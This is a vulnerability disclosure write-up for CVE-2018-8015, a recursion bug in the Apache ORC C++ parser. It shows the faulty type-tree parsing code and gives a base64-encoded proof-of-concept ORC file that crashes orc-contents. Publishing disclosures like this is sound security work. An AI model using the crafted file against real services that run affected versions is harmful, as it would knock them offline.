CVE-2018-8015: Denial of Service in Apache ORC

A malformed ORC file can trigger an endlessly recursive function call in the C++ parser which results in a segmentation fault.

The impact of this bug is most likely denial-of-service against software that uses the C++ ORC file parser but may lead to possible code execution.

In addition, the Java parser is similarly affected but a stack overflow in Java simply results in an exception being raised.

Affected Versions

According to the Apache ORC team, Apache ORC versions 1.0.0 to 1.4.3 are affected.

Description

The vulnerable lines of code is in c++/src/TypeImpl.cc and is triggered when parsing the schme contained in the Footer section of the ORC file.

An ORC database schema is defined as a type tree. The root of any ORC database is a Struct which can contain other types, including another Struct. In the Footer section, the type tree is encoded as a linked-list like structure where compound types like a Struct contain an id pointing to the next type in the tree.

390    case proto::Type_Kind_STRUCT: {
391      TypeImpl* result = new TypeImpl(STRUCT);
392      uint64_t size = static_cast<uint64_t>(type.subtypes_size());
393      std::vector<Type*> typeList(size);
394      std::vector<std::string> fieldList(size);
395      for(int i=0; i < type.subtypes_size(); ++i) {
396        result->addStructField(type.fieldnames(i),
397                               convertType(footer.types(static_cast<int>
398                                                        (type.subtypes(i))),
399                                           footer));
400      }
401      return std::unique_ptr<Type>(result);
402    }

The above code parses the type tree encoded in the Footer section. When it encounters a Struct (or Union) type, it recursively parses all subtypes. However, it does not account for the case where a subtype's next id points to the parent type. This results in an endless recursion that eventually blows the stack.

Proof of Concept

The file poc.orc is included here as a base64 encoded file.

CAMQ9AMaACILCAwSAQEaBEFBQUEiCwgMEgEAGgRBQUFBKgA6AAglEAAiAgAMMAaC
9AMDT1JDEQgDEPQDGgAiCwgMEgEBGgRBQUFBIgsIDBIBABoEQUFBQSoAOgAIJRAA
IgIADDAGgvQDA09SQxE=

Attempting to parse the file with orc-contents results in a segmentation fault.

$ ./orc-contents poc.orc
Segmentation fault

Credits

This issue was discovered by Terry Chia (Ayrx).

Timeline

If you have any feedback or notice any errors in the post, I'd love to hear from you. You can find various ways of contacting me at the about me page!